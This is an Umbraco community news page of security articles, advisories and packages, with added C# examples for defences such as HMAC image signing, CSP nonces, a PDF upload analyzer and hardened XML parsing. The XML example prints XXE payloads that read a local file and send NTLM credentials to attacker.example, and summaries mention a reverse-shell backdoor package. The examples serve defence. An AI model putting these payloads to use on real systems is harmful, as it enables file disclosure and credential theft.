Articles tagged #security


UMB.FYI
2026-05-27

📦 M1sterPl0w.Umbraco.AccessRestriction

An Umbraco package that restricts access to your site (or specific paths) by IP address whitelist.

2026-05-20

📰 AI on Your Terms: How Umbraco Reimagines AI

At Digital Excellence 2026, Jeppe Birkebæk Truelsen demonstrated how Umbraco enables membership organizations to scale content while maintaining brand voice and data security. By implementing a governance layer for AI, organizations can define boundaries and retain control, ensuring AI acts as an assistant rather than a decision-maker, fostering accountability and trust.

📦 HCS.Passwordless.WebAuthn

WebAuthn/FIDO2 passkey add-on for Umbraco 17 passwordless member authentication.

📦 HCS.Passwordless.Otp

One-time password (OTP) email add-on for Umbraco 17 passwordless member authentication.

2026-05-13

📰 Carlini-style software vulnerability hunting, on a budget

Nicholas Carlini discussed using Anthropic's Claude models for automated vulnerability discovery in software. Liam Laverty replicated this approach in the Umbraco-CMS repository using a heuristics-based method, achieving significant cost reduction—under $20 compared to Carlini's $40k—while identifying potential vulnerabilities and improving documentation, although no CVEs were found.

2026-05-06

📰 Umbraco Member thrown out after changing password

The migration of the Newsletter Studio website from Umbraco 8 to Umbraco 17 revealed a security feature that logs out members upon password changes. This occurs due to the default settings preventing concurrent logins. Solutions include refreshing the login cookie after a password change or enabling concurrent logins in appsettings.json.
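As an added example, not code from the Newsletter Studio write-up or from Umbraco itself: a member-facing change-password action that re-issues the login cookie after a successful change, which is the first of the two fixes described above. It assumes the Umbraco 13-style SurfaceController constructor, IMemberManager and IMemberSignInManager from Umbraco.Cms.Core.Security, and the mechanism that the summary implies: the password change rotates the member's security stamp (standard ASP.NET Core Identity behaviour) and, with concurrent logins disabled, the pre-change cookie is then rejected. The controller, action and form field names are illustrative.

```csharp
using System.Threading.Tasks;
using Microsoft.AspNetCore.Identity;
using Microsoft.AspNetCore.Mvc;
using Umbraco.Cms.Core.Cache;
using Umbraco.Cms.Core.Logging;
using Umbraco.Cms.Core.Routing;
using Umbraco.Cms.Core.Security;
using Umbraco.Cms.Core.Services;
using Umbraco.Cms.Core.Web;
using Umbraco.Cms.Infrastructure.Persistence;
using Umbraco.Cms.Web.Website.Controllers;

// Illustrative surface controller (not from the original post). Posted to from a
// change-password form on a members-only page.
public class ChangePasswordSurfaceController : SurfaceController
{
    private readonly IMemberManager _memberManager;
    private readonly IMemberSignInManager _signInManager;

    public ChangePasswordSurfaceController(
        IUmbracoContextAccessor umbracoContextAccessor,
        IUmbracoDatabaseFactory databaseFactory,
        ServiceContext services,
        AppCaches appCaches,
        IProfilingLogger profilingLogger,
        IPublishedUrlProvider publishedUrlProvider,
        IMemberManager memberManager,
        IMemberSignInManager signInManager)
        : base(umbracoContextAccessor, databaseFactory, services, appCaches, profilingLogger, publishedUrlProvider)
    {
        _memberManager = memberManager;
        _signInManager = signInManager;
    }

    [HttpPost]
    [ValidateAntiForgeryToken]
    public async Task<IActionResult> ChangePassword(string currentPassword, string newPassword)
    {
        MemberIdentityUser? member = await _memberManager.GetCurrentMemberAsync();
        if (member is null)
        {
            return Unauthorized();
        }

        // Requires the current password, so a stolen session cookie alone cannot rotate it.
        IdentityResult result = await _memberManager.ChangePasswordAsync(member, currentPassword, newPassword);
        if (!result.Succeeded)
        {
            foreach (IdentityError error in result.Errors)
            {
                ModelState.AddModelError(string.Empty, error.Description);
            }
            return CurrentUmbracoPage();
        }

        // Assumed mechanism: Identity rotates the member's security stamp on a password change.
        // With the default Umbraco:CMS:Security:AllowConcurrentLogins = false the cookie issued
        // before the change still carries the old stamp and is rejected on the next request,
        // which is the "thrown out" behaviour. Re-issuing the cookie here keeps this browser
        // signed in; any other session still holding the old stamp is ended, which is usually
        // what you want after a password change.
        await _signInManager.RefreshSignInAsync(member);

        return RedirectToCurrentUmbracoPage();
    }
}
```

The alternative from the post is configuration rather than code: setting `Umbraco:CMS:Security:AllowConcurrentLogins` to `true` in appsettings.json stops the logout, but at the cost of letting one member account hold several live sessions at once, so prefer refreshing the cookie unless concurrent sessions are a requirement.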

2026-04-29

📰 UmBackdoor

In a recent blog post, the author reflects on the UmBackdoor, a proof-of-concept Umbraco package created in 2019. The package allowed attackers to install a backdoor for remote access via a reverse shell. The author discusses various password reset techniques and emphasizes the importance of security measures to prevent such exploits.

2026-04-22

📦 uBrokenWindow

Generate a new backoffice user account on application startup. Use with care!

2026-03-11

📰 Umbraco CMS Security Advisory, March 10, 2026

Andy Butland outlines security patches for Umbraco 16.0.0 - 16.5.0 and 17.0.0 - 17.2.1, addressing three vulnerabilities: vertical privilege escalation, cross-site scripting (XSS), and unauthorized modification of domain data. Users are urged to upgrade to secure their CMS; Umbraco Cloud projects receive the fix automatically.

📰 Securing Umbraco Images with HMAC

Nathaniel Nunes discusses the security risk in Umbraco's on-the-fly image processing: anyone who can request arbitrary crop and resize variants can force expensive work and overload the server. He recommends HMAC-signed image requests, shows how to configure them for Razor and Next.js front ends, stresses keeping the HMAC key secret, and mentions further security checks arriving in Umbraco 17.3.0.
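An added example, not from Nunes's article and not Umbraco's or ImageSharp.Web's own code: the signing and verifying halves of an HMAC-protected image URL. The canonical string signed here (lower-cased path plus query parameters sorted by name, minus the hmac parameter) is this example's own choice and is not byte-compatible with Umbraco's built-in signing, so use it to understand the mechanism rather than as a drop-in. The media path, parameter names and key handling are illustrative.

```csharp
using System;
using System.Linq;
using System.Security.Cryptography;
using System.Text;

// Illustrative HMAC-signed image URLs. The server signs the variants it intends to serve;
// the image endpoint refuses any request whose tag does not match, so clients cannot mint
// their own (expensive) width/height/mode combinations.
public static class SignedImageUrl
{
    private const string HmacParam = "hmac";

    // What gets signed: lower-cased path plus the query, sorted by name, without any
    // existing hmac parameter. Sorting makes "?width=800&height=450" and
    // "?height=450&width=800" sign identically, so reordering cannot bypass the check.
    private static string Canonical(string pathAndQuery)
    {
        string[] parts = pathAndQuery.Split('?', 2);
        string path = parts[0].ToLowerInvariant();
        if (parts.Length == 1)
        {
            return path;
        }

        var pairs = parts[1]
            .Split('&', StringSplitOptions.RemoveEmptyEntries)
            .Where(p => !p.StartsWith(HmacParam + "=", StringComparison.OrdinalIgnoreCase))
            .Select(p => p.ToLowerInvariant())
            .OrderBy(p => p, StringComparer.Ordinal);
        return path + "?" + string.Join("&", pairs);
    }

    private static string Mac(string canonical, byte[] key) =>
        Convert.ToHexString(HMACSHA256.HashData(key, Encoding.UTF8.GetBytes(canonical))).ToLowerInvariant();

    // Server side only. The key must never reach the browser: a Next.js front end signs in
    // its server components or route handlers, not in client code.
    public static string Sign(string pathAndQuery, byte[] key)
    {
        string separator = pathAndQuery.Contains('?') ? "&" : "?";
        return pathAndQuery + separator + HmacParam + "=" + Mac(Canonical(pathAndQuery), key);
    }

    // Image endpoint: recompute and compare in constant time. Any change to the path or to
    // width/height/mode/format yields a different MAC.
    public static bool Verify(string pathAndQuery, byte[] key)
    {
        string? provided = pathAndQuery.Split('?', 2).ElementAtOrDefault(1)?
            .Split('&')
            .FirstOrDefault(p => p.StartsWith(HmacParam + "=", StringComparison.OrdinalIgnoreCase))?
            .Substring(HmacParam.Length + 1);
        if (string.IsNullOrEmpty(provided))
        {
            return false; // unsigned requests are refused outright
        }

        byte[] expected = Encoding.ASCII.GetBytes(Mac(Canonical(pathAndQuery), key));
        byte[] given = Encoding.ASCII.GetBytes(provided.ToLowerInvariant());
        return CryptographicOperations.FixedTimeEquals(expected, given);
    }

    public static void Main()
    {
        // In production load the key from configuration or a secret store, never from source.
        byte[] key = RandomNumberGenerator.GetBytes(32);

        string signed = Sign("/media/abc123/hero.jpg?width=800&height=450&mode=crop", key);
        Console.WriteLine(signed);
        Console.WriteLine(Verify(signed, key));                                      // True
        Console.WriteLine(Verify(signed.Replace("width=800", "width=8000"), key));   // False: tampered size
        Console.WriteLine(Verify(signed.Replace("hmac=", "hmac=00"), key));          // False: bad tag
        Console.WriteLine(Verify("/media/abc123/hero.jpg?width=800", key));          // False: unsigned
    }
}
```

Two practical notes follow from the code: a leaked key lets an attacker sign any variant, so rotate it like any other credential and keep it out of client bundles; and since the path is part of the signed string, a tag for one media item cannot be replayed against another.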

2026-02-04

📰 Mitigating CVE-2025-67288 in Umbraco 13 (if you feel you need to)

Jason Elkin critiques CVE-2025-67288, arguing that it misrepresents Umbraco's handling of PDF uploads that contain embedded JavaScript: Umbraco does not process such files in any way that leads to remote code execution or XSS. For those who still want an extra check, he proposes an IFileStreamSecurityAnalyzer that rejects such files at upload time.
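As an added example, not Elkin's code: an IFileStreamSecurityAnalyzer that refuses PDF uploads whose raw bytes contain the action and JavaScript dictionary keys, plus the composer that registers it. It assumes the interface shape FileContentMatchesFileType/IsConsideredSafe from Umbraco.Cms.Core.Security and registration through builder.FileStreamSecurityAnalyzers().Add<T>(); the list of names to reject is this example's own.

```csharp
using System;
using System.IO;
using System.Text;
using Umbraco.Cms.Core.Composing;
using Umbraco.Cms.Core.DependencyInjection;
using Umbraco.Cms.Core.Security;
using Umbraco.Extensions;

// Illustrative analyzer. Heuristic only: PDF names can be written with #xx escapes and
// objects can live inside Flate-compressed object streams, so a plain byte scan catches
// the common case, not every case. Substring matching also means "/JS" matches "/JSON",
// so widen the check with a real PDF parser if false positives matter.
public class PdfFileStreamSecurityAnalyzer : IFileStreamSecurityAnalyzer
{
    private static readonly byte[] PdfMagic = Encoding.ASCII.GetBytes("%PDF-");

    private static readonly string[] SuspiciousNames =
    {
        "/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
    };

    // Umbraco asks this first; only analyzers whose type matches get to vote on safety.
    public bool FileContentMatchesFileType(Stream fileStream)
    {
        fileStream.Position = 0;
        Span<byte> header = stackalloc byte[PdfMagic.Length];
        int read = fileStream.Read(header);
        fileStream.Position = 0;
        return read == PdfMagic.Length && header.SequenceEqual(PdfMagic);
    }

    public bool IsConsideredSafe(Stream fileStream)
    {
        fileStream.Position = 0;
        // Latin1 maps each byte to exactly one char, so the text scan sees every byte unchanged.
        using var reader = new StreamReader(fileStream, Encoding.Latin1, false, 8192, leaveOpen: true);
        string content = reader.ReadToEnd();
        fileStream.Position = 0;

        foreach (string name in SuspiciousNames)
        {
            if (content.Contains(name, StringComparison.Ordinal))
            {
                return false; // Umbraco then rejects the upload as unsafe
            }
        }
        return true;
    }
}

// Registers the analyzer alongside Umbraco's own (for example the SVG one).
public class PdfAnalyzerComposer : IComposer
{
    public void Compose(IUmbracoBuilder builder) =>
        builder.FileStreamSecurityAnalyzers().Add<PdfFileStreamSecurityAnalyzer>();
}
```

Resetting the stream position before and after each read matters because Umbraco passes the same stream on to storage after the analyzers have run.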

📰 Handling editor-injected JavaScript in Umbraco v17 with Umbraco Community CSPManager

Debasish Gracias discusses implementing a Content Security Policy (CSP) for Umbraco v17, focusing on allowing editors to embed JavaScript securely. He outlines a method to automatically inject CSP nonces into editor-supplied script tags, ensuring compliance with strict CSP settings while maintaining flexibility for content creators.
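An added example, not from Gracias's article and independent of the Umbraco Community CSPManager package it uses: a per-request nonce, injected into editor-supplied script tags, and the matching header. The regex, the helper names and the sample rich-text value are this example's own.

```csharp
using System;
using System.Security.Cryptography;
using System.Text.RegularExpressions;

// Illustrative nonce handling for editor-authored HTML. Only scripts that the nonce is
// attached to may run; inline event handlers and eval stay blocked under the header below.
public static class EditorScriptNonce
{
    // Matches an opening <script ...> tag that does not already carry a nonce attribute.
    private static readonly Regex ScriptOpenTag = new(
        @"<script\b(?![^>]*\bnonce\s*=)([^>]*)>",
        RegexOptions.IgnoreCase | RegexOptions.Compiled);

    // 128 bits of CSPRNG output, base64: safe inside a quoted attribute and inside the header.
    // Generate one per response and never reuse it, or the nonce stops meaning anything.
    public static string NewNonce() => Convert.ToBase64String(RandomNumberGenerator.GetBytes(16));

    // Rewrites the editor's markup so every <script> opening tag carries the nonce.
    public static string AddNonce(string editorHtml, string nonce) =>
        ScriptOpenTag.Replace(editorHtml, m => $"<script nonce=\"{nonce}\"{m.Groups[1].Value}>");

    // 'strict-dynamic' lets nonce-bearing scripts load further scripts without host allow-lists.
    public static string Header(string nonce) =>
        $"script-src 'nonce-{nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'self'";

    public static void Main()
    {
        // Constructed sample of a rich-text property value as an editor might save it.
        const string editorHtml =
            "<p>Watch the talk:</p>\n" +
            "<script src=\"https://player.example/embed.js\" async></script>\n" +
            "<script>window.playerId = 'talk-42';</script>\n" +
            "<p onclick=\"alert(1)\">Inline handlers get no nonce and stay blocked.</p>";

        string nonce = NewNonce();
        Console.WriteLine("Content-Security-Policy: " + Header(nonce));
        Console.WriteLine(AddNonce(editorHtml, nonce));
    }
}
```

The nonce has to be the same value in the header and in the markup, so generate it once early in the request (middleware, stored on HttpContext.Items) and read it from the view when calling AddNonce. Note what the nonce does not do: it does not sanitize the editor's HTML, it only tells the browser that scripts the editor chose to publish are allowed, so the usual controls on who may edit rich text still apply.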

2026-01-28

📰 Top 10 Umbraco Security Vulnerabilities that You Must know in 2026

Keyur Garala outlines critical Umbraco security vulnerabilities for 2026, emphasizing the importance of regular updates, strong authentication, and proper user permissions. He highlights risks from outdated software, insecure plugins, and misconfigured environments. To safeguard against cyber threats, Garala advocates for consistent security practices and partnering with Arroact for professional support.

2025-12-10

📰 Security Advisory, December 9, 2025: Security Patch is now available

Umbraco versions 13.0.0 to 13.12.0 are vulnerable through an issue with .udt file uploads, allowing potential file system enumeration and NTLM hash retrieval. A patch is available in Umbraco 13.12.1, and Umbraco Cloud sites are automatically updated. Thanks to Tomasz Holeksa for reporting the vulnerability.
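An added example, not Umbraco's own patch: the advisory summary does not say what the underlying bug was, but file enumeration and NTLM hash capture are the classic results of an XML parser that resolves external entities, and a .udt export is XML. The block shows the generic defence for that failure class: hardened XmlReaderSettings that refuse DOCTYPE declarations and external fetches, tried against two constructed payloads. Element names and paths are illustrative, not Umbraco's schema.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

// Illustrative hardened XML loading. Settings are explicit rather than relying on defaults,
// which differ between XmlReader.Create, XmlTextReader and older framework versions.
public static class SafeUdtXml
{
    public static XmlReaderSettings Hardened() => new XmlReaderSettings
    {
        DtdProcessing = DtdProcessing.Prohibit, // any <!DOCTYPE ...> is a parse error
        XmlResolver = null,                     // never dereference file://, http:// or UNC paths
        IgnoreProcessingInstructions = true,
    };

    // Returns the document type name, or throws XmlException for hostile input.
    public static string LoadName(Stream udt)
    {
        using var reader = XmlReader.Create(udt, Hardened());
        var doc = new XmlDocument { XmlResolver = null };
        doc.Load(reader);
        return doc.SelectSingleNode("/DocumentType/Info/Name")?.InnerText
               ?? throw new XmlException("missing /DocumentType/Info/Name");
    }

    public static bool IsAccepted(string xml)
    {
        try
        {
            LoadName(new MemoryStream(Encoding.UTF8.GetBytes(xml)));
            return true;
        }
        catch (XmlException ex)
        {
            Console.WriteLine("rejected: " + ex.Message);
            return false;
        }
    }

    public static void Main()
    {
        // Constructed samples.
        const string benign =
            "<?xml version=\"1.0\"?><DocumentType><Info><Name>Blog Post</Name></Info></DocumentType>";

        // Entity resolution would read a local file into the imported name (file enumeration).
        const string fileRead =
            "<?xml version=\"1.0\"?><!DOCTYPE d [<!ENTITY x SYSTEM \"file:///C:/Windows/win.ini\">]>" +
            "<DocumentType><Info><Name>&x;</Name></Info></DocumentType>";

        // A UNC SYSTEM identifier makes a Windows host open an SMB connection to the attacker,
        // authenticating with the app pool identity's NTLM credentials (hash capture).
        const string uncLeak =
            "<?xml version=\"1.0\"?><!DOCTYPE d [<!ENTITY x SYSTEM \"\\\\attacker.example\\share\\a\">]>" +
            "<DocumentType><Info><Name>&x;</Name></Info></DocumentType>";

        Console.WriteLine(IsAccepted(benign));   // True
        Console.WriteLine(IsAccepted(fileRead)); // False
        Console.WriteLine(IsAccepted(uncLeak));  // False
    }
}
```

Both hostile samples fail at the DOCTYPE before any entity is looked at, which is the point: with DtdProcessing.Prohibit there is no code path that could ever contact a file or a share, regardless of how the payload is encoded.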

2025-11-26

📰 The Bot That Shouldn’t Have Taken Down My Umbraco Site, and the WAF Rule That Fixed It

Jason Elkin discusses a recent Denial of Service incident affecting an Umbraco site due to bot-generated form submissions. The excessive logging and errors from these submissions degraded performance. Implementing a Cloudflare WAF rule to limit POST requests effectively blocked 3 million malicious requests, ensuring site stability for legitimate users.

2025-10-22

📺 Umbraco upgrades – Bump Digital

Umbraco upgrades have evolved significantly, transitioning from challenging migrations to smoother processes, especially from version 10 onwards. Bump Digital emphasizes the importance of proactive planning, client communication, and leveraging modern .NET features to enhance performance and security. Upgrades are now more manageable, with predictable release schedules and improved documentation for breaking changes.

2025-09-24

📰 Security Advisory, September 23, 2025: Security Patches are now available

Andy Butland reports that moderate and low security vulnerabilities in Smidge, an upstream dependency for Umbraco 13.0.0 - 13.10.1, have been addressed with patches. Users are advised to upgrade to the latest version, while Umbraco Cloud projects will receive automatic updates. Further details are available in the release notes.

2025-09-03

📺 Webinar: The Truth About Security In Open Source CMS – For Enterprise Leaders

Umbraco HQ hosts a panel discussion with experts Emma Burstow, Chris Osterhout, and Zoja Antuchevič on open source software security. They address misconceptions, stressing community involvement, transparency, and effective implementation. The discussion emphasizes the importance of education in procurement, a collaborative approach to risk management, and balancing developer freedom with security measures.

2025-08-20

📦 IM.ContentSecurityPolicy

Content Security Policy utilities for Umbraco CMS applications.

2025-07-30

🚨 Security Advisory, July 29, 2025: Security Patches are now available

Umbraco versions 13.0.0 to 16.1.0 are affected by a vulnerability in the Content Delivery API, allowing unauthorized access to cached content without a valid API key. Patches are available for the latest minor versions, and Umbraco Cloud sites will be automatically updated. Users are advised to upgrade to supported versions for security.


UMB.FYI is built with ❤ by the Umbraco community and is not affiliated with Umbraco HQ